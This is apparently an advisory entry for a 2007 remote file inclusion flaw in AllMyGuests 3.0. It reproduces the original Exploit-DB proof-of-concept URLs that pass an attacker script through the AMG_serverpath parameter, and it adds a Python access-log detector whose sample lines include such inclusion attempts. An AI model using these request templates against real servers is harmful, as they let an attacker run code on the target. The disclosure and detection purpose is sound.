Vendor: AllMyGuests
By: beks
CVSS: 5.5 (MEDIUM)
Remote File Inclusion
CWE: 98
Product Name: AllMyGuests
Affected Version From: 3
Affected Version To: 3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

AllMyGuests 3.0 Remote File Inclusion Vulnerability

AllMyGuests 3.0 is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by supplying the location of a malicious script in the 'AMG_serverpath' parameter of the 'comments.php' and 'signin.php' files. This allows the attacker to include and execute arbitrary files on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of AllMyGuests that has patched this issue. Additionally, input validation should be implemented so that user-supplied data is properly sanitized before it is used in file inclusion operations.

Exploit-DB raw data:

AllMyGuests 3.0 Remote File Inclusion Vulnerability

#Software: AllMyGuests

#Version: 3.0

#Download: http://download.php-resource.net/AllMyGuests/AllMyGuests0.3.0.zip

#Found By: beks

#Bug In:

/include/submit.inc.php
/admin/index.php
/include/cm_submit.inc.php
/comments.php
/index.php
/signin.php

#Risk: Medium

http://[target]/[AllMyGuests_Path]/comments.php?AMG_serverpath=[evil_script]
http://[target]/[AllMyGuests_Path]/signin.php?sent=1&AMG_serverpath=[evil_script]

# milw0rm.com [2007-01-07]
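
A log check for the requests described above, as an added example that is not part of the original advisory or of AllMyGuests: it flags access-log requests to the listed scripts that carry an AMG_serverpath query parameter and marks values that begin with a URL scheme. The log format, the sample lines and the premise that legitimate clients never send this parameter are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "AMG_serverpath"  # parameter named in the advisory
# Script paths from the advisory's "Bug In" list.
SCRIPTS = ("/include/submit.inc.php", "/admin/index.php",
           "/include/cm_submit.inc.php", "/comments.php",
           "/index.php", "/signin.php")
# Request field of an access-log line (combined-style format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that begins with a URL scheme such as http:// or ftp://.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

# Constructed sample lines (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Jan/2007:10:00:01 +0000] "GET /gb/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Jan/2007:10:02:13 +0000] "GET /gb/comments.php?AMG_serverpath=http://host.example/a.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [07/Jan/2007:10:02:20 +0000] "GET /gb/signin.php?sent=1&AMG_serverpath=http%3A%2F%2Fhost.example%2Fa.txt HTTP/1.1" 200 298',
    '198.51.100.9 - - [07/Jan/2007:10:05:44 +0000] "GET /gb/signin.php?sent=1&AMG_serverpath=/var/www/gb/ HTTP/1.1" 200 4410',
    '192.0.2.10 - - [07/Jan/2007:10:06:02 +0000] "GET /gb/signin.php?sent=1 HTTP/1.1" 200 4410',
]


def classify(line):
    """Return None, 'param-supplied' or 'remote-url' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith(SCRIPTS):
        return None
    # parse_qsl percent-decodes, so an encoded http%3A%2F%2F is seen as http://
    values = [v for k, v in parse_qsl(url.query, keep_blank_values=True)
              if k == PARAM]
    if not values:
        return None
    if any(SCHEME_RE.match(v.strip()) for v in values):
        return "remote-url"
    return "param-supplied"


def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := classify(line)) is not None]


if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```

Only the query string is visible in an access log, so a request that carries the same parameter name in a POST body or cookie is outside what this check sees.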